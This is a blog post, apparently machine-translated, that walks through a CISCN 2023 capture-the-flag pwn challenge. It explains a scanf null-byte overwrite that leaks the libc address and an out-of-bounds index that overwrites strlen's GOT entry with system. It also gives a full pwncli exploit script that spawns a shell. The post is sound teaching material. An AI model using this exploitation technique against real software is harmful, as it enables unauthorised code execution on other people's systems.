BuringStraw

BuringStraw

HomeArchives

CISCN 2023 Northeast Regional pwn

#pwn44
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The CISCN 2023 Northeast Regional pwn challenge involves exploiting a vulnerability in the strlen function's Global Offset Table (GOT) to leak libc address and gain control over the program flow. The challenge includes a script for exploiting the vulnerability and modifying the program's libc and ld.so using patchelf.

(Slow update 1/4)

Novice Challenge#

One-liner version: Modify the got table of strlen

First, leak the libc address from sub_96B:

int sub_96B()
{
  int v1; // [rsp+Ch] [rbp-264h] BYREF
  __int64 v2[44]; // [rsp+10h] [rbp-260h] BYREF
  char v3[252]; // [rsp+170h] [rbp-100h] BYREF
  int v4; // [rsp+26Ch] [rbp-4h]

  v4 = 4;
  puts("Welcome to this challenge!");
  v2[0] = (__int64)&puts;
  __isoc99_scanf("%252s", v3);
  puts("Good luck!");
  __isoc99_scanf("%d", &v1);
  if ( v1 > 15 && v1 <= 21 )
    v4 = v1;
  else
    puts("No!");
  puts("gift:");
  return puts((const char *)&v2[v4]);
}

The goal is to obtain the address of puts in v2[0].
Since scanf %s appends a null character after the string and the length limit does not include this null character, as long as 252 characters are entered, v4 will be overwritten with 0, and then enter a number that will not enter the if statement.

Next, let's look at:

int sub_A31()
{
  size_t v0; // rax

  puts("index>>");
  __isoc99_scanf("%d", &dword_2020BC);
  if ( (unsigned int)dword_2020BC >= 0x20 )
  {
    puts("No!");
    exit(1);
  }
  puts("input>>");
  read(0, byte_2020A0, 0x20uLL);
  v0 = strlen(byte_2020A0);
  printf("data length is %d\n", v0);
  puts("bye~");
  read(0, &byte_2020A0[dword_2020BC], 4uLL);
  return close(1);
}

2020a0+0x20>2020bc, so it is possible to overwrite this index and write it to another location.
The got of strlen is located at 2020a0-136. Take the complement of the negative number.

Exp:

#!/usr/bin/env python3

from pwncli import *

cli_script()

libc: ELF = gift.libc
filename = gift.filename  # current filename
is_debug = gift.debug  # is debug or not
is_remote = gift.remote  # is remote or not
gdb_pid = gift.gdb_pid  # gdb pid if debug


if gift.remote:
    libc = ELF("./libc.so.6")
    gift[libc] = libc

sla("challenge!", "a" * 252)

sla("luck!", "0")

lb = recv_current_libc_addr(0x80970, 0x1000)

libc.address = lb

leak_ex2(lb)

sla("index>>\n", "0")

sa("input>>", flat({0: "/bin/sh;", 0x1C: p32(0xFFFFFF78)}))
print(hex(libc.sym.system))
sa("bye", flat(libc.sym.system)[:-4])

rl()
ia()

Note:

  1. The subsequent positions in the array in sub_96b will contain a function address from ld.so (only appears when using the target version of libc), see: https://www.cnblogs.com/7resp4ss/p/17530599.html

  2. Use patchelf to modify the program's libc and ld.so (interpreter). Only changing libc may cause issues.

patchelf --set-interpreter /home/w1nd/Desktop/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so /home/w1nd/Desktop/pwn
patchelf --replace-needed libc.so.6 /home/w1nd/Desktop/buu/libc-2.23-x64.so pwn

See: https://www.cnblogs.com/xshhc/p/16777707.html
3. Linux ELF and Dynamic Linking Libraries https://juejin.cn/post/6939332933677219848

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.